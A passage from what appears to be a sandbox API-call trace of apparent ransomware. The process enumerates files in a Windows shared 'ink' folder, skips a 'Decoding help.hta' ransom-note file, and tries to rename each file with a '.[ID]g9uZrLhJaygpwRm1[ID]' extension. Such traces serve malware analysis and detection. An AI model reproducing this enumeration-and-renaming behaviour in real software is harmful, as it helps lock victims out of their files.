Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.194] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.194] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsnld.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" [0053.194] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" [0053.194] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.194] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsnor.xml", cAlternateFileName="")) returned 1 [0053.194] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.194] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.194] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.195] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.195] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsnor.xml") returned -1 [0053.195] lstrlenW (lpString="ipsnor.xml") returned 10 [0053.195] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.195] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.195] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsnor.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" [0053.195] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" [0053.195] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.195] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsplk.xml", cAlternateFileName="")) returned 1 [0053.195] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.195] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.195] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.195] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.195] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsplk.xml") returned -1 [0053.195] lstrlenW (lpString="ipsplk.xml") returned 10 [0053.195] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.195] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.195] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsplk.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" [0053.195] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" [0053.195] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.196] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.205] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63de1b63, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x63de1b63, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a991650, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsPlugin.dll", cAlternateFileName="")) returned 1 [0053.205] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.205] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.205] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.205] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IpsPlugin.dll") returned -1 [0053.205] lstrlenW (lpString="IpsPlugin.dll") returned 13 [0053.205] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.205] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.205] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="IpsPlugin.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll" [0053.205] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll" [0053.206] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0053.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.206] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsptb.xml", cAlternateFileName="")) returned 1 [0053.206] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.206] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.206] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.206] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsptb.xml") returned -1 [0053.206] lstrlenW (lpString="ipsptb.xml") returned 10 [0053.206] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.206] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.206] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsptb.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" [0053.206] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" [0053.206] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.206] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsptg.xml", cAlternateFileName="")) returned 1 [0053.206] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.206] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.206] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.207] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsptg.xml") returned -1 [0053.207] lstrlenW (lpString="ipsptg.xml") returned 10 [0053.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsptg.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" [0053.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" [0053.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.207] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsrom.xml", cAlternateFileName="")) returned 1 [0053.207] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.207] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsrom.xml") returned -1 [0053.207] lstrlenW (lpString="ipsrom.xml") returned 10 [0053.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsrom.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" [0053.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" [0053.208] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.208] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsrus.xml", cAlternateFileName="")) returned 1 [0053.208] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.208] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.208] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.208] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsrus.xml") returned -1 [0053.208] lstrlenW (lpString="ipsrus.xml") returned 10 [0053.208] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.208] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.208] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsrus.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" [0053.208] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" [0053.208] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.210] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: 